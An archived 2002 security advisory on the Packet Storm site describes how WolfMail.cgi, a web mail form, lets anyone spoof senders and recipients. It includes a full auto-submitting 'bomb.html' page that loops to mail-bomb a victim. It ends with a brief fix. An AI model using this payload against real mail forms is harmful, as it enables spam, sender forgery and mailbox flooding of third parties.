exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

wolfmail.cgi.txt

wolfmail.cgi.txt
Posted May 13, 2002
Authored by Dead Beat | Site advknowledge.net

WolfMail.cgi, a script that works similarly to formmail.cgi, allows users to send mail via a web interface. The configuration for WolfMail.cgi is not internally hardcoded but is passed via parameters in html input statements allowing any user to send fake mail.

tags | exploit, web, cgi
SHA-256 | 3778400e8f79eb597d173c53cc2b7232adf9d3124bea0458e83e4ede52030d94

wolfmail.cgi.txt

Change Mirror Download

*+-._\_.-+*
WolfMail.cgi
*+-._/_.-+*

by Dead Beat
The Advanced Knowledge Network
https://www.advknowledge.net

Mailirritation possibillity
(fake and highfire an account)

Wolfmail is a script similar to formmail.cgi which allows users to send mails
from the page without using their Mailclient. However I guess the developers didn't
want to make the script in the way that you configurate it in the actual script but
send all the variables to the script from the actuall execution file.

________
FAKING:

So as said most of the real configuration is done in the actual _.html file so for
example the <input type="hidden" name="recipient" value="user@host.com">
is specified in the _.html file of the composer. You can easily download the site and
change the code. If, for example you, want to fake a mail to: "fake@mailhost.com" you
just have to change the value field. Other things like subject and cc can be defined
(read the installation papers to learn more)

For Example:

<input type="hidden" name="recipient" value="email@example.com">
<input type="hidden" name="subject" value="From your site...">

could be changed to:

<input type="text" name="recipient" value="spam@mail.com">
<input type="text" name="subject" value="Hi you">
<input type="text" name="abemail" value="fake@mail.com" size="17" maxlength="140">

that would allow you to self define those two values and send the mail from fake@mail.com to spam@mail.com.

Just so that I don't get any mails of any users here that don't understand this:
When you download the html file to change all the stuff you have to set the path to where
formmail.php actually is so if you download it you will find a line like this:

<form action="scripts/formmail.php" method="POST" enctype="multipart/form-data">

If you downloaded from https://www.mailscriptuser.com/contact.html you have to change the upper line to:

<form action="https://www.mailscriptuser.com/scripts/formmail.php" method="POST" enctype="multipart/form-data">

Got that? Good next little security vuln. attackers could trip over is the kind of bombing an adress.


___________
HIGH FIRE

There is a variable called "redirect" this allows you to send the user to a site after the actual
mailing is done.(Something that tells you such as: "Thanks! Your mail was send" or whatever) this
option looks like this

<input TYPE="HIDDEN" name="redirect" value="https://www.domain.com/contact/mail/thanks.htm">

Since the script itself doesn't check(log) your IP an
attacker could download the html file, predefine all values(like message, subject, recipient,...) and then
set a java-script that reloads the site and set the redirect url to the html with the predefined values this
way a loop would run and send, send and send emails all over and over again.

EXAMPLE bomb.html:
<html>
<head>
<body onload="document.bomber.submit();">
<form name="bomber" method="POST" action="https://www.domain.com/contact/mail/wolfmail.cgi">
<input TYPE="text" name="required" value="adMail-Text|abemail">
<input TYPE="text" name="subject" value="Exploiting wolfmail.cgi">
<input TYPE="text" name="recipient" value="Victim@mail.com">
<input TYPE="text" name="redirect" value="C:\Exploit\bomb.html">
<input type="text" name="aaName" value="Wolfmail Exploiter" size="17" maxlength="140">
<input type="text" name="abemail" value="fake@mail.com" size="17" maxlength="140">
<textarea name="adMail-Text" rows="4" cols="13" wrap="virtual">Bombing text goes here</textarea>
<input type="submit" value="submit">
</body>
</head>
</html>

The upper script can of course be used on many forms, so other mailforms may be affected too.
It is also possible to flood forums with such script! I hope you will re-configure and check
out your forms and the actual scripts behind it for this vulnerabillity. If you have found
another script that this trick works with mail me I will include them here and you will get
a credit ofcourse!

SOLUTION
You should change the script or use another one so that the IP's you send from can only be used
ONCE and let the email be predefined in a file or in the actual script.

I am quite sure that these aren't all of the bugs but I didn't really go into the code. This is
just what I saw first. Thanks to b0iler and Ravish! Greetings out to StartX, Road^K|ll, Silver
and all of my friends I forgot!

Truthfully,
Dead Beat, strebergarten@hotmail.com
The Advanced Knowledge Network
https://www.advknowledge.net

Want more, new, better BUGS and other Informations? Then visit us!


--
Best regards,
Dead Beat
The Advanced Knowledge Network
https://www.advknowledge.net
mailto:Dead_Beat@gmx.de


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close